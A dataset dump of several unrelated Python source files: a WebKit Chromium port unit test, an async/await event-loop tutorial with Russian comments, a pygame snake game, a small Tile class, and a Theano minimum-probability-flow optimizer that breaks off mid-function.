test_test_shell_command(self):\n expected_command = \"test.html 2 checksum\\n\"\n self.assertEqual(self.driver._test_shell_command(\"test.html\", 2, \"checksum\"), expected_command)\n\n def _assert_write_command_and_read_line(self, input=None, expected_line=None, expected_stdin=None, expected_crash=False):\n if not expected_stdin:\n if input:\n expected_stdin = input\n else:\n # We reset stdin, so we should expect stdin.getValue = \"\"\n expected_stdin = \"\"\n self.driver._proc.stdin = StringIO.StringIO()\n line, did_crash = self.driver._write_command_and_read_line(input)\n self.assertEqual(self.driver._proc.stdin.getvalue(), expected_stdin)\n self.assertEqual(line, expected_line)\n self.assertEqual(did_crash, expected_crash)\n\n def test_write_command_and_read_line(self):\n self.driver._proc = Mock() # FIXME: This should use a tighter mock.\n # Set up to read 3 lines before we get an IOError\n self.driver._proc.stdout = StringIO.StringIO(\"first\\nsecond\\nthird\\n\")\n\n unicode_input = u\"I \\u2661 Unicode\"\n utf8_input = unicode_input.encode(\"utf-8\")\n # Test unicode input conversion to utf-8\n self._assert_write_command_and_read_line(input=unicode_input, expected_stdin=utf8_input, expected_line=\"first\\n\")\n # Test str() input.\n self._assert_write_command_and_read_line(input=\"foo\", expected_line=\"second\\n\")\n # Test input=None\n self._assert_write_command_and_read_line(expected_line=\"third\\n\")\n # Test reading from a closed/empty stream.\n # reading from a StringIO does not raise IOError like a real file would, so raise IOError manually.\n def mock_readline():\n raise IOError\n self.driver._proc.stdout.readline = mock_readline\n self._assert_write_command_and_read_line(expected_crash=True)\n\n def test_crash_log(self):\n self.driver._proc = Mock()\n\n # Simulate a crash by having stdout close unexpectedly.\n def mock_readline():\n raise IOError\n self.driver._proc.stdout.readline = mock_readline\n self.driver._proc.pid = 1234\n\n self.driver.test_to_uri = lambda test: 'mocktesturi'\n self.driver._port.driver_name = lambda: 'mockdriver'\n self.driver._port._get_crash_log = lambda name, pid, out, err, newer_than: 'mockcrashlog'\n driver_output = self.driver.run_test(DriverInput(test_name='some/test.html', timeout=1, image_hash=None, should_run_pixel_test=False))\n self.assertTrue(driver_output.crash)\n self.assertEqual(driver_output.crashed_process_name, 'mockdriver')\n self.assertEqual(driver_output.crashed_pid, 1234)\n self.assertEqual(driver_output.crash_log, 'mockcrashlog')\n\n def test_stop(self):\n self.pid = None\n self.wait_called = False\n self.driver._proc = Mock() # FIXME: This should use a tighter mock.\n self.driver._proc.pid = 1\n self.driver._proc.stdin = StringIO.StringIO()\n self.driver._proc.stdout = StringIO.StringIO()\n self.driver._proc.stderr = StringIO.StringIO()\n self.driver._proc.poll = lambda: None\n\n def fake_wait():\n self.assertTrue(self.pid is not None)\n self.wait_called = True\n\n self.driver._proc.wait = fake_wait\n\n class FakeExecutive(object):\n def kill_process(other, pid):\n self.pid = pid\n self.driver._proc.poll = lambda: 2\n\n self.driver._port._executive = FakeExecutive()\n self.driver.KILL_TIMEOUT_DEFAULT = 0.01\n self.driver.stop()\n self.assertTrue(self.wait_called)\n self.assertEquals(self.pid, 1)\n\n def test_two_drivers(self):\n\n class MockDriver(chromium.ChromiumDriver):\n def __init__(self, port):\n chromium.ChromiumDriver.__init__(self, port, worker_number=0, pixel_tests=False)\n\n def cmd_line(self, pixel_test, per_test_args):\n return 'python'\n\n # get_option is used to get the timeout (ms) for a process before we kill it.\n driver1 = MockDriver(self.port)\n driver1._start(False, [])\n driver2 = MockDriver(self.port)\n driver2._start(False, [])\n # It's possible for driver1 to timeout when stopping if it's sharing stdin with driver2.\n start_time = time.time()\n driver1.stop()\n driver2.stop()\n self.assertTrue(time.time() - start_time < 20)\n\n def test_stop_cleans_up_properly(self):\n self.driver._test_shell = False\n self.driver.start(True, [])\n last_tmpdir = self.port._filesystem.last_tmpdir\n self.assertNotEquals(last_tmpdir, None)\n self.driver.stop()\n self.assertFalse(self.port._filesystem.isdir(last_tmpdir))\n\n def test_two_starts_cleans_up_properly(self):\n # clone the WebKitDriverTest tests here since we override start() and stop()\n self.driver._test_shell = False\n self.driver.start(True, [])\n last_tmpdir = self.port._filesystem.last_tmpdir\n self.driver._start(True, [])\n self.assertFalse(self.port._filesystem.isdir(last_tmpdir))\n\n def test_expectations_dict(self):\n self.port._filesystem.write_text_file('/mock-checkout/LayoutTests/platform/chromium/TestExpectations', 'upstream')\n self.port._filesystem.write_text_file('/mock-checkout/Source/WebKit/chromium/webkit/tools/layout_tests/test_expectations.txt', 'downstream')\n self.assertEquals('\\n'.join(self.port.expectations_dict().values()), 'upstream\\ndownstream')\n\n self.port._filesystem.write_text_file(self.port.path_from_chromium_base('skia', 'skia_test_expectations.txt'), 'skia')\n self.assertEquals('\\n'.join(self.port.expectations_dict().values()), 'upstream\\nskia\\ndownstream')\n\n\nclass ChromiumPortLoggingTest(logtesting.LoggingTestCase):\n\n # FIXME: put this someplace more useful\n def test_check_sys_deps(self):\n port = chromium_port_testcase.ChromiumPortTestCase.TestLinuxPort()\n\n # Success\n port._executive = MockExecutive2(exit_code=0)\n self.assertTrue(port.check_sys_deps(needs_http=False))\n\n # Failure\n port._executive = MockExecutive2(exit_code=1,\n output='testing output failure')\n self.assertFalse(port.check_sys_deps(needs_http=False))\n self.assertLog([\n 'ERROR: System dependencies check failed.\\n',\n 'ERROR: To override, invoke with --nocheck-sys-deps\\n',\n 'ERROR: \\n',\n 'ERROR: testing output failure\\n'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"WebKit-IFC/Tools/Scripts/webkitpy/layout_tests/port/chromium_unittest.py","file_name":"chromium_unittest.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56513161","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttps://sohabr.net/habr/post/359018/\nДублирую материал отсюда с дополнительными пояснениями.\n\nЗдесь демонстрируются некоторые вещи, лежащие в основе asyncio - приоткрывается свет на то, как работает\nasync / await.\n\nКлючевые мысли:\n\n1. async / await != asyncio, просто наиболее часто эти понятия использются вместе.\nНо на самом деле async / await это некоторые синтаксические конструкции языка, которые под капотом генерируют нужные\nпримитивы, а уже эти примитивы используются в модуле asyncio. Иначе говоря async / await можно использовать отдельно,\nбез asyncio. Здесь показан пример как мог бы выглядеть asyncio изнутри при максимальном и схематичном упрощении\n\n2. Упрощённо говоря await можно рассматривать как yield from. Есть некоторая разница (в плане ограничений),\nно по смыслу это почти одно и то же\n\n3. Самая ключевая мысль, вытекающая из прошлого пункта: await ничего не блокирует! А просто отдаёт управление\nнекоторому вызывающему коду (также как yield) и вместе с этим отдаёт инструкции как и когда надо эту корутину будить\nТ.е. await aiolib.some_io_request(data) надо читать так:\n * Сделать какой-то some_io_request с данными data\n * Сделать типа yield из этой корутины с передачей управление обратно в event loop и инструкцией, когда\n нужно будить обратно эту корутину.\n * Т.е. назначение some_io_request - это опционально провести какую-то инициализацию i/o, и подготовить инструкции\n когда надо будить текущую сопрограмму.\n\n4. async def делает из обычной функции корутину и позволяет изнутри использовать await\n\n5. Отличия await от yield from: в общем случае await может принимать только объект awaitable,\n т.е. у которого есть __await__(). Из наиболее частых таких бывают три объекта - корутина, таска, и фьюча.\n Отличив в том, что yield from можно с обычным генератором, а await - нельзя. В данном коде это обошли путём\n выставления генератору флажка CO_ITERABLE_COROUTINE (тогда await начинает дружить с генератором),\n но это хак.\n\n6. TODO: что должен реализовать и вернуть __await__?\n\n\"\"\"\n\nimport datetime\nimport heapq\nimport types\nimport time\n\nclass Task:\n\n \"\"\"Представляет, как долго сопрограмма должна ждать перед возобновлением выполнения.\n\n Операторы сравнения реализованы для использования в heapq.\n К сожалению, кортеж с двумя элементами не работает, потому что,\n когда экземпляры класса datetime.datetime равны, выполняется\n сравнение сопрограмм, а поскольку они не имеют методом, реализующих\n операции сравнения, возникает исключение.\n\n Считайте класс подобием о asyncio.Task/curio.Task.\n \"\"\"\n\n def __init__(self, wait_until, coro):\n self.coro = coro\n self.waiting_until = wait_until\n\n def __eq__(self, other):\n return self.waiting_until == other.waiting_until\n\n def __lt__(self, other):\n return self.waiting_until < other.waiting_until\n\n\nclass SleepingLoop:\n\n \"\"\"Event loop, сфокусированный на отложенном выполнении сопрограмм.\n\n Считайте класс подобием asyncio.BaseEventLoop/curio.Kernel.\n \"\"\"\n\n def __init__(self, *coros):\n self._new = coros\n self._waiting = []\n\n def run_until_complete(self):\n # Запустить все сопрограммы.\n for coro in self._new:\n # Здесь последовательно запускаются все сопрограммы до тех пор пока не достигнут yield,\n # он же await в данном случае. Посте остановки кладём сопрограмму в очередь ожидающих\n wait_until = coro.send(None)\n heapq.heappush(self._waiting, Task(wait_until, coro))\n\n # Не прерывать выполнение, пока есть выполняющиеся сопроцедуры.\n while self._waiting:\n now = datetime.datetime.now()\n\n # Получаем сопрограмму с самым ранним временем возобновления.\n # В данном примере это просто очередь с приоритетом - кого надо разбудить раньше\n # Реальный asyncio, понятно, сложнее\n task = heapq.heappop(self._waiting)\n\n if now < task.waiting_until:\n # Мы оказались здесь раньше, чем нужно,\n # поэтому подождем, когда придет время возобновить сопрограмму.\n delta = task.waiting_until - now\n time.sleep(delta.total_seconds())\n now = datetime.datetime.now()\n\n # Время возобновить выполнение сопрограммы.\n try:\n # продолжаем программу - до тех пор пока не наткнёмся на следующий await\n # (он же yield) который вернёт нам новый wait_until\n wait_until = task.coro.send(now)\n heapq.heappush(self._waiting, Task(wait_until, task.coro))\n except StopIteration:\n # Сопрограмма завершена - больше там нет await (иначе говоря yeild-ов)\n pass\n\n\n# sleep без декоратора вернёт обычный питоновский генератор (потому что внутри yield),\n# а декоратор @types.coroutine к этому генератору назначит флажок, что он ещё и корутина (CO_ITERABLE_COROUTINE)\n# при этом тип не меняется - sleep(N) вернёт по-прежнему генератор, но такой, который умеет работать с await,\n# потому что флажок\n@types.coroutine\ndef sleep(seconds):\n \"\"\"Останавливает сопрограмму на указанное количество секунд.\n\n Считайте класс подобием asyncio.sleep()/curio.sleep().\n \"\"\"\n now = datetime.datetime.now()\n wait_until = now + datetime.timedelta(seconds=seconds)\n # Останавливаем все сопроцедуры в текущем стэке. Тут необходимо\n # использовать ```yield```, чтобы создать сопрограмму на базе генератора,\n # а не на базе ```async```.\n\n # actual прилетает сюда из строки выше: wait_until = task.coro.send(now)\n actual = yield wait_until\n\n # Возобновляем стэк выполнения, возвращая время,\n # которое мы провели в ожидании.\n return actual - now\n\n\n# Если тут убрать async, то будет ошибка 'await' outside async function\n# Но если вместо await поставить yield from - всё будет работать норм\n# Т.е. async здесь - просто синтаксическая штука, чтобы await можно было юзать вместо yield from\nasync def countdown(label, length, *, delay=0): # вернёт потому что async def\n \"\"\"\n Начинает обратный отсчет с секунд ```length``` и с задержкой ```delay```.\n Это обычно то, что реализует пользователь.\n \"\"\"\n print(label, 'waiting', delay, 'seconds before starting countdown')\n\n \"\"\"\n В строке delta = await sleep(delay) заключена вся магия. И тут несколько пунктов:\n\n 1. sleep формально это не awaitable, это обычный генератор, но у него есть флажок,\n CO_ITERABLE_COROUTINE (см. декоратор над ним), поэтому await в данном случае под капотом превращается в\n yield from sleep(delay)\n\n 2. Самое интересное, что мы тут ничего не ждём, а просто возвращаем управление\n очереди событий, которая уже сама будет управлять всяческим ожиданием.\n Если смотреть на это как на yield from sleep(delay), станет понятно, что тут мы вернули wait_until -\n точку во времени, до какого момента надо приостановить эту корутину.\n \"\"\"\n delta = await sleep(delay)\n\n print(label, 'starting after waiting', delta)\n while length:\n print(label, 'T-minus', length)\n waited = await sleep(1)\n length -= 1\n print(label, 'lift-off!')\n\n\ndef main():\n \"\"\"Запустить event loop с обратным отсчетом 3 отдельных таймеров.\n\n Это обычно то, что реализует пользователь.\n \"\"\"\n\n loop = SleepingLoop(\n countdown('A', 5),\n countdown('B', 3, delay=2),\n countdown('C', 4, delay=1),\n )\n start = datetime.datetime.now()\n loop.run_until_complete()\n print('Total elapsed time is', datetime.datetime.now() - start)\n\n\nif __name__ == '__main__':\n main()\n\n\n\"\"\"\nA waiting 0 seconds before starting countdown\nB waiting 2 seconds before starting countdown\nC waiting 1 seconds before starting countdown\nA starting after waiting 0:00:00.000047\nA T-minus 5\nC starting after waiting 0:00:01.001220\nC T-minus 4\nA T-minus 4\nB starting after waiting 0:00:02.001018\nB T-minus 3\nC T-minus 3\nA T-minus 3\nB T-minus 2\nC T-minus 2\nA T-minus 2\nB T-minus 1\nC T-minus 1\nA T-minus 1\nB lift-off!\nC lift-off!\nA lift-off!\nTotal elapsed time is 0:00:05.005210\n\"\"\"\n","sub_path":"languages/python/asyncio/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":11614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"390160936","text":"#OOPS implementation\r\n#NOTE:The creation of this game is focused on object oriented programming.'''\r\n\r\n'''We are working in a grid system with a total of 20 rows and 20 columns.So, if position is (10, 10) \r\nmeans we are in 11th column and the 11th row (because position count starts from 0)'''\r\n\r\nimport random\r\nimport math\r\nimport pygame\r\nimport time\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\npygame.init()\r\nmove_sound = pygame.mixer.Sound(\"move.mp3\")\r\neat_sound = pygame.mixer.Sound(\"Snack2.mp3\")\r\npygame.mixer.music.load(\"back1.mp3\")\r\n\r\npygame.font.init()\r\nfont_style = pygame.font.SysFont(\"bahnschrift\", 25)\r\nscore_font = pygame.font.SysFont(\"comicsansms\", 25)\r\n\r\ndef draw_text_middle(surface, text, size, color): \r\n global width\r\n font = pygame.font.SysFont('comicsans', size, bold = True)\r\n label = font.render(text, 1, color)\r\n\r\n surface.blit(label, (width/5, width/2))\r\n\r\nclass cube(object):\r\n rows = 20\r\n w = 500\r\n def __init__(self, start, dirnx=1, dirny=0,color=(255, 0, 0)): #'dirnx=1' -> snake starts moving(right) automatically when game starts\r\n self.pos = start\r\n self.dirnx = 1\r\n self.dirny = 0\r\n self.color = color \r\n \r\n def move(self, dirnx, dirny): #here,(dirnx, dirny): change-in-position(made in 'snake'class) but in '__init__()' it's the starting-position\r\n self.dirnx = dirnx\r\n self.dirny = dirny\r\n self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny) #changes position so that snake appears to move\r\n\r\n def draw(self, surface, eyes=False):\r\n dis = self.w // self.rows #'dis' is the width(lenght=width) of one grid \r\n i = self.pos[0] #column number\r\n j = self.pos[1] #row number\r\n pygame.draw.rect(surface, self.color, (i*dis+1, j*dis+1, dis-2, dis-2)) #pygame.draw.pygame.draw.line(Surface, color, start_pos, end_pos, thickness)\r\n #Drawing the eyes\r\n if eyes:\r\n centre = dis // 2 #'//' is regular division with result as an integer\r\n radius = 3\r\n circleMiddle = (i*dis + centre - radius, j*dis + 8)\r\n circleMiddle2 = (i*dis + dis - radius*2, j*dis + 8)\r\n pygame.draw.circle(surface, (0, 0, 0), circleMiddle, radius) #pygame.draw.circle(Surface, color, pos, radius)\r\n pygame.draw.circle(surface, (0, 0, 0), circleMiddle2, radius)\r\n\r\n#contains a bunch of cube objects\r\nclass snake(object):\r\n body = [] #contains the address of cube-objects present at different position\r\n turns = {}\r\n\r\n def __init__(self, color, pos):\r\n self.color = color\r\n self.head = cube(pos) #head of snake(first cube) is equal to cube at given position\r\n self.body.append(self.head) #adding cubes(position) to make the body \r\n self.dirnx = 0\r\n self.dirny = 0\r\n\r\n def move(self):\r\n global opposite_dirn\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n #keys = pygame.key.get_pressed() ->gets a dictionary of all keyboard-keys and if they were pressed(value = 1) or not(value = 0)\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n pygame.mixer.Sound.play(move_sound)\r\n if self.dirnx == 1:\r\n continue\r\n opposite_dirn = True\r\n else:\r\n self.dirnx = -1\r\n self.dirny = 0\r\n '''Now we should store the position where the snake(head) turns so that whole body also turns. \r\n Thus we add a key(by copying([:]) current position-of-head('self.head.pos') as key) and set its \r\n value = '[self.dirnx, self.dirny]' to the 'turns' dictionary'''\r\n self.turns[self.head.pos[:]] = [self.dirnx, self.dirny] #'[:]' copies the tuple to a variable(to key-of-dictionary)\r\n elif event.key == pygame.K_RIGHT:\r\n pygame.mixer.Sound.play(move_sound)\r\n if self.dirnx == -1:\r\n continue\r\n opposite_dirn = True\r\n else:\r\n self.dirnx = 1\r\n self.dirny = 0\r\n self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]\r\n elif event.key == pygame.K_UP:\r\n pygame.mixer.Sound.play(move_sound)\r\n if self.dirny == 1:\r\n continue\r\n opposite_dirn = True\r\n else:\r\n self.dirny = -1\r\n self.dirnx = 0\r\n self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]\r\n #print(self.dirnx, self.dirny) //prints 0 -1 in console\r\n elif event.key == pygame.K_DOWN:\r\n pygame.mixer.Sound.play(move_sound)\r\n if self.dirny == -1:\r\n continue\r\n opposite_dirn = True\r\n else:\r\n self.dirny = 1\r\n self.dirnx = 0\r\n self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]\r\n\r\n for i, c in enumerate(self.body): #'c' points to the cubes; one cube at a time; present in the list 'body'\r\n p = c.pos[:] #copying([:]) the position-of-current-cube(c.pos) to new variable 'p' \r\n ''' we may have written just 'p = c.pos' but it may cause problems when 'c.position' changes its value. But '[:]' copies the \r\n value of'c.pos' to the new variable 'p' thus 'p' won't change even if 'c.pos' changes''' \r\n #If we have pressed any of the four arrow keys\r\n if p in self.turns: #if the cube position present in 'turns' as a 'key-of-the-dictionary'\r\n turn = self.turns[p] #storing the position(x, y; where we want to turn); in a tuple(here: 'turn')\r\n c.move(turn[0], turn[1]) #turns[0] -> x and turns[1] -> y; here we actually move\r\n if i == len(self.body) - 1:\r\n self.turns.pop(p) #dict.'pop(k, d=None)'-> removes specified key and return the corresponding value\r\n '''once we are on the last cube we'll remove 'p' to avoid this -> Whenever the snake reachs position 'p' on screen,\r\n it will turn regardless of pressing any key because 'p' is still present in the 'turns' dictionary''' \r\n\r\n #When snake reaches the end of screen, it emerges from the other side\r\n else:\r\n '''[dirnx = -1] -> left direction but [dirny = -1] -> upward direction\r\n [c.row - 1] -> last row or column'''\r\n if c.dirnx == -1 and c.pos[0] <= 0: #while moving left and crosses the left end(x = 0)\r\n c.pos = (c.rows-1, c.pos[1]) #'rows' represent columns\r\n elif c.dirnx == 1 and c.pos[0] >= c.rows-1: #while moving right and crosses the right end(x is max)\r\n c.pos = (0, c.pos[1])#'rows' represent columns\r\n elif c.dirny == 1 and c.pos[1] >= c.rows-1: #while moving down crosses the bottom(y is max)\r\n c.pos = (c.pos[0], 0)#'rows' represent rows\r\n elif c.dirny == -1 and c.pos[1] <= 0: #while moving up crosses the top (y = 0)\r\n c.pos = (c.pos[0], c.rows-1)#'rows' represent rows\r\n else: #if a key is pressed to change the direction and thus snake does'nt reach any end\r\n c.move(c.dirnx, c.dirny) #then keep on moving in the changed direction \r\n\r\n def reset(self, pos):\r\n self.head = cube(pos) #head of snake(first cube) is equal to cube at given position\r\n self.body = []\r\n self.body.append(self.head) #adding cubes(position) to make the body \r\n self.turns = {}\r\n self.dirnx = 0\r\n self.dirny = 1\r\n\r\n def addCube(self):\r\n tail = self.body[-1]\r\n dx, dy = tail.dirnx, tail.dirny \r\n\r\n if dx == 1 and dy == 0: #when going right, add cube to the left of tail\r\n self.body.append(cube((tail.pos[0]-1, tail.pos[1])))\r\n elif dx == -1 and dy == 0:\r\n self.body.append(cube((tail.pos[0]+1, tail.pos[1])))\r\n elif dx == 0 and dy == 1:\r\n self.body.append(cube((tail.pos[0], tail.pos[1]-1)))\r\n elif dx == 0 and dy == -1:\r\n self.body.append(cube((tail.pos[0], tail.pos[1]+1)))\r\n\r\n #added cube should move in directoion of tail \r\n self.body[-1].dirnx = dx\r\n self.body[-1].dirny = dy\r\n\r\n def draw(self, surface):\r\n for i, c in enumerate(self.body):\r\n if i == 0: #if it's the first cube\r\n c.draw(surface, True) #draws both (cube and eyes) \r\n else:\r\n c.draw(surface) #draws the cube only\r\n\r\ndef drawGrid(w, rows, surface):\r\n spaceBtw = w // rows\r\n x = 0\r\n y = 0\r\n for i in range(rows):\r\n x += spaceBtw\r\n y += spaceBtw\r\n pygame.draw.line(surface, (255, 255, 255), (x, 0), (x, w)) #vertical lines\r\n pygame.draw.line(surface, (255, 255, 255), (0, y), (w, y)) #horizontal lines\r\n\r\ndef redrawWindow(surface, score):\r\n global width, rows, s, snack\r\n surface.fill((0, 0 , 0))\r\n my_score(score)\r\n s.draw(surface)\r\n snack.draw(surface)\r\n #drawGrid(width, rows, surface)\r\n pygame.display.update()\r\n\r\ndef randomSnack(row, item): #'item' is snake object\r\n global rows\r\n positions = item.body #'positions' is a list of different cubes('cube-objects') present in the current-snake-length(the list 'body') \r\n\r\n while True:\r\n x = random.randrange(rows) #random column-number between 0 and 20\r\n y = random.randrange(rows) #random row-number between 0 and 20\r\n\r\n #filter(function, sequence) -> 'function' checks the sequence and filters out the items according to 'function'\r\n #lambda arguments:expression -> can take any number of arguments, but only one expression(executed and the result is returned)\r\n\r\n #Ensuring that snack never appears on snake\r\n\r\n if len(list(filter(lambda z:z.pos == (x, y), positions))) > 0:\r\n continue\r\n '''NOTE: Here 'z' switches b/w different cube-objects present in the list 'body'(of 'snake' class).If object-position('z.pos') is equal\r\n to snack-position(x,y),then we'll store 'z.pos' in a list; this makes list-length > 0.Hence,list-length tells us \r\n if the snack is present on the snake or not; and if it is, then another value for (x, y) gets chosen.'''\r\n else:\r\n break\r\n \r\n return (x, y)\r\n\r\ndef my_score(score):\r\n win = pygame.display.set_mode((width, width))\r\n value = score_font.render(\"Score: \" + str(score), True, (255, 255, 255))\r\n win.blit(value, [0, 0])\r\n\r\ndef message_box(subject, content):\r\n root = tk.Tk()\r\n root.attributes(\"-topmost\", True)\r\n messagebox.showinfo(subject, content)\r\n try:\r\n root.destroy()\r\n except:\r\n pass\r\n\r\ndef main():\r\n global width, rows, s, snack, opposite_dirn\r\n width = 500\r\n rows = 20\r\n win = pygame.display.set_mode((width, width))\r\n s = snake((255, 0, 0), (10, 10)) #snake(color, pos)\r\n snack = cube(randomSnack(rows, s), color = (0, 255, 0))\r\n clock = pygame.time.Clock()\r\n play = True\r\n score = 0\r\n pygame.mixer.music.play(-1)\r\n speed = 10\r\n\r\n while play:\r\n opposite_dirn = False\r\n #pygame.time.delay(50)\r\n clock.tick(speed)\r\n speed += 0.03\r\n if speed >= 17:\r\n speed = 17\r\n s.move()\r\n if s.body[0].pos == snack.pos:\r\n pygame.mixer.Sound.play(eat_sound)\r\n score += 1\r\n s.addCube()\r\n snack = cube(randomSnack(rows, s), color = (0, 255, 0))\r\n for x in range(len(s.body)):\r\n #map(function, iterable) -> every iterable is passed to function and result is returned\r\n if s.body[x].pos in list(map(lambda z:z.pos, s.body[x+1:])) and opposite_dirn == False: \r\n draw_text_middle(win, \"GAME OVER!\", 50, (255, 255, 255))\r\n pygame.display.update()\r\n pygame.time.delay(3000)\r\n s.reset((10, 10))\r\n score = 0\r\n break\r\n \r\n redrawWindow(win, score)\r\n\r\nmain()\r\n","sub_path":"public/3main2.py","file_name":"3main2.py","file_ext":"py","file_size_in_byte":12462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548172121","text":"import sys, pygame\nfrom pygame.locals import *\n\n\nclass Tile():\n\n\n def __init__(self, img, x, y):\n self.image_location =img\n self.image = pygame.image.load(img)\n self.x = x\n self.y = y\n","sub_path":"demo_game/Tile.py","file_name":"Tile.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"52541433","text":"'''\nThis is the Deep MPF which used the free energy.\n'''\n\nimport numpy as np\nimport gzip\nimport timeit, pickle, sys, math\nimport theano\nimport theano.tensor as T\nimport matplotlib.pyplot as plt\nfrom lasagne.updates import nesterov_momentum\nfrom lasagne.updates import adam, rmsprop\nfrom theano.tensor.shared_randomstreams import RandomStreams\nimport sys\nsys.setrecursionlimit(40000)\n\n\nclass free_energy_dmpf_optimizer(object):\n\n def __init__(self,epsilon = 1.0, visible_units = 16, hidden_units =8, W = None, b_vis = None,b_hid = None,\n input = None,explicit_EM = False, batch_sz = 20, theano_rng = None, connect_function = '1-bit-flip' ):\n '''\n\n :param W: the weights of the graph\n :param b: the bias of the graph\n :param input: input binary data samples\n :param connect_function: connection type\n :return:\n '''\n #W = np.load(W_path)\n #b = np.load(b_path)\n self.visible_units = visible_units\n self.hidden_units = hidden_units\n\n numpy_rng = np.random.RandomState(12336)\n\n if theano_rng is None:\n theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))\n self.theano_rng = theano_rng\n\n if W is None:\n initial_W = np.asarray(numpy_rng.randn(self.visible_units, self.hidden_units) / np.sqrt(self.visible_units),\n dtype=theano.config.floatX)\n # theano shared variables for weights and biases\n self.W = theano.shared(value= initial_W, name='W', borrow=True)\n else:\n self.W = theano.shared(value=np.asarray(W,dtype=theano.config.floatX),name = 'Weight', borrow = True)\n\n if b_vis is None:\n self.b_vis = theano.shared(\n value=np.zeros(self.visible_units,dtype=theano.config.floatX),name='b_vis',borrow=True)\n else:\n self.b_vis = theano.shared(value=np.asarray(b_vis,dtype=theano.config.floatX),name = 'b)vis', borrow = True)\n\n\n if b_hid is None:\n self.b_hid = theano.shared(\n value=np.zeros(self.hidden_units, dtype=theano.config.floatX),name='bias',borrow=True)\n else:\n self.b_hid = theano.shared(value=np.asarray(b_hid,dtype=theano.config.floatX),name = 'bias', borrow = True)\n\n self.epsilon = epsilon\n self.batch_sz = batch_sz\n if not input:\n self.input = T.matrix('input')\n else:\n self.input = input\n\n self.params = [self.W, self.b_vis, self.b_hid]\n\n\n def feedforward(self, data_samples):\n\n return T.exp(T.dot(data_samples, self.W) + self.b_hid)\n\n\n def free_energy(self, data_samples):\n\n wx = self.feedforward(data_samples)\n vbias_term = T.dot(data_samples, self.b_vis)\n hidden_term = T.sum(T.log(1 + wx), axis=1)\n return -hidden_term - vbias_term\n\n\n def get_cost_updates(self, learning_rate = 0.01,):\n '''\n In this function we compute the cost of deep MPF for the 1-bit-flip case.\n We use a for-loop to compute the flip for each bit.\n We do not use tensor or the tile functions, which can help reduce the for-loop to single matrix operation.\n '''\n base_energy = self.feedforward(data_samples=self.input)\n\n cost = 0\n\n\n\n for j in range(50):\n\n i = np.random.randint(low=0,high=self.visible_units,size=(1,))[0]\n\n # in every step, compute the MPF between x and a one-bit-flip non-data neighbor\n\n non_data_energy = 1 + (base_energy * \\\n T.exp(T.dot((1-2*self.input[:,i].reshape([1,-1])).T, self.W[i,:].reshape([1,-1]))))\n\n data_energy = 1 + base_energy\n #energy_diff = T.sum(T.exp(0.5*T.log(T.prod(non_data_energy/data_energy, axis =1))))\n\n energy_diff = 0.5*T.sum(T.log(non_data_energy/data_energy),axis =1) \\\n - 0.5*self.b_vis[i]*(1-2*self.input[:,i].reshape([1,-1]))\n\n cost = cost + (self.epsilon/self.batch_sz)*T.sum(T.exp(energy_diff))\n\n #cost = T.sum(non_data_energy)\n gparams = T.grad(cost, self.params, consider_constant=[self.input])\n # W_grad = T.grad(cost=cost, wrt = self.W,consider_constant=[self.input])\n # b_vis_grad = T.grad(cost=cost, wrt=self.b_vis,consider_constant=[self.input])\n # b_hid_grad = T.grad(cost=cost, wrt=self.b_hid,consider_constant=[self.input])\n #\n # cache = W\n #\n # x += - learning_rate * dx / (np.sqrt(cache) + eps)\n\n #updates = [(self.params, self.params - learning_rate * gparams)]\n\n #updates = rmsprop(loss_or_grads=gparams,params=self.params, learning_rate=0.1, rho=0.9, epsilon=1e-08)\n\n updates = [\n (param, param - learning_rate * gparam)\n for param, gparam in zip(self.params, gparams)\n ]\n\n return cost, updates\n def propup(self, vis):\n '''This function propagates the visible units activation upwards to\n the hidden units\n\n Note that we return also the pre-sigmoid activation of the\n layer. As it will turn out later, due to how Theano deals with\n optimizations, this symbolic variable will be needed to write\n down a more stable computational graph (see details in the\n reconstruction cost function)\n\n '''\n pre_sigmoid_activation = T.dot(vis, self.W) \\\n + self.b_hid\n return [pre_sigmoid_activation, T.nnet.sigmoid(pre_sigmoid_activation)]\n\n def sample_h_given_v(self, v0_sample):\n ''' This function infers state of hidden units given visible units '''\n # compute the activation of the hidden units given a sample of\n # the visibles\n pre_sigmoid_h1, h1_mean = self.propup(v0_sample)\n # get a sample of the hiddens given their activation\n # Note that theano_rng.binomial returns a symbolic sample of dtype\n # int64 by default. If we want to keep our computations in floatX\n # for the GPU we need to specify to return the dtype floatX\n h1_sample = self.theano_rng.binomial(size=h1_mean.shape,\n n=1, p=h1_mean,\n dtype=theano.config.floatX)\n return [pre_sigmoid_h1, h1_mean, h1_sample]\n\n def propdown(self, hid):\n '''This function propagates the hidden units activation downwards to\n the visible units\n\n Note that we return also the pre_sigmoid_activation of the\n layer. As it will turn out later, due to how Theano deals with\n optimizations, this symbolic variable will be needed to write\n down a more stable computational graph (see details in the\n reconstruction cost function)\n\n '''\n pre_sigmoid_activation = T.dot(hid, self.W.T) \\\n + self.b_vis\n return [pre_sigmoid_activation, T.nnet.sigmoid(pre_sigmoid_activation)]\n\n def sample_v_given_h(self, h0_sample):\n ''' This function infers state of visible units given hidden units '''\n # compute the activation of the visible given the hidden sample\n pre_sigmoid_v1, v1_mean = self.propdown(h0_sample)\n # get a sample of the visible given their activation\n # Note that theano_rng.binomial returns a symbolic sample of dtype\n # int64 by default. If we want to keep our computations in floatX\n # for the GPU we need to specify to return the dtype floatX\n v1_sample = self.theano_rng.binomial(size=v1_mean.shape,\n n=1, 